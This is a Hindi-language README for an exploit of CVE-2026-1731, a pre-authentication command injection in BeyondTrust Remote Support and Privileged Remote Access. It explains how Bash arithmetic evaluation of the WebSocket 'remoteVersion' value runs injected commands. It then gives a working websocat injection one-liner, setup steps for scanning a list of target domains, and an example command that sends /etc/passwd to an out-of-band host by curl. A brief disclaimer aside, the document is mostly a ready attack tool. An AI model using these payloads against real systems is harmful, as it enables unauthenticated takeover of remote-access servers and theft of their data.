
CVE-2026-1731 - BeyondTrust रिमोट सपोर्ट और प्रिविलेज्ड रिमोट एक्सेस में गंभीर कमांड इंजेक्शन भेद्यता, जो WebSocket-सुलभ स्क्रिप्ट में असुरक्षित Bash अंकगणितीय मूल्यांकन के कारण उत्पन्न होती है।
[!WARNING] यह स्क्रिप्ट केवल शैक्षिक और अनुसंधान प्रयोजनों के लिए है। बिना स्पष्ट अनुमति के सिस्टम के विरुद्ध इसका उपयोग न करें। अनधिकृत पहुंच या परीक्षण अवैध और अनैतिक है। इस स्क्रिप्ट का उपयोग करने से पहले पूर्ण अस्वीकरण पढ़ें।
यह स्क्रिप्ट BeyondTrust Remote Support (RS) और Privileged Remote Access (PRA) को प्रभावित करने वाली एक गंभीर कमांड इंजेक्शन भेद्यता (CVE-2026-1731) का प्रदर्शन करती है। यह समस्या उसी WebSocket-सुलभ एंडपॉइंट से उत्पन्न होती है जो पहले की हाई-प्रोफाइल CVE-2024-12356 में शामिल था, जिससे यह एक निकट संबंधित वैरिएंट बन जाता है।
भेद्यता इसलिए मौजूद है क्योंकि सर्वर की thin-scc-wrapper स्क्रिप्ट हमलावर-नियंत्रित इनपुट पर अंकगणितीय तुलना करती है, विशेष रूप से WebSocket हैंडशेक के दौरान भेजे गए remoteVersion मान पर। Bash संख्यात्मक तुलनाओं में ऑपरेंड को अभिव्यक्ति मानता है, सादे स्ट्रिंग के रूप में नहीं, जिससे कि a[$(cmd)]0 जैसे तैयार किए गए पेलोड मूल्यांकन के दौरान मनमाना कमांड निष्पादन को ट्रिगर कर सकते हैं।
भले ही BeyondTrust ने इस पैच चक्र में एक संख्यात्मक सैनिटी चेक जोड़ा है, यह Bash को बाद में अभिव्यक्ति मूल्यांकन करने से नहीं रोकता है, जिससे एंडपॉइंट शोषणीय रहता है। हमलावर केवल एक WebSocket कनेक्शन खोलकर और प्रमाणीकरण से पहले एक दुर्भावनापूर्ण संस्करण मान भेजकर कोड निष्पादन प्राप्त कर सकते हैं।
echo -ne "hax[\$(ATTACKER-COMMAND)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | \
./websocat -k wss://AFFECTED-SYSTEM:443/nw \
--protocol "ingredi support desk customer thin" \
-H "X-Ns-Company: COMPANY-NAME" \
--binary -n -
pip3 install requests
wget -O websocat https://github.com/vi/websocat/releases/download/v1.14.1/websocat.x86_64-unknown-linux-musl
chmod +x websocat
(इसे अपनी Python स्क्रिप्ट वाले फ़ोल्डर में रखें।)
या इसे सिस्टम-वाइड ले जाएँ:
sudo mv websocat /usr/local/bin/
domains.txt बनाएँवे URL जोड़ें जिनका आप परीक्षण करना चाहते हैं:
example1.com
example2.com
example3.com
WebSocket शोषण को निष्पादित करने के लिए आप जिस कमांड को कॉन्फ़िगर करना चाहते हैं, उसे स्क्रिप्ट में निम्नलिखित पंक्ति संपादित करें:
CMD = "YOUR-COMMAND-HERE"
उदाहरण के लिए:
CMD = "curl -X POST -d @/etc/passwd http://XXXXXXXXX.oast.fun/"
एक बार कमांड सेट हो जाने पर, स्क्रिप्ट चलाएँ:
python3 exploit.py
या इसे निष्पादन योग्य बनाएँ और सीधे चलाएँ:
chmod +x exploit.py
./exploit.py

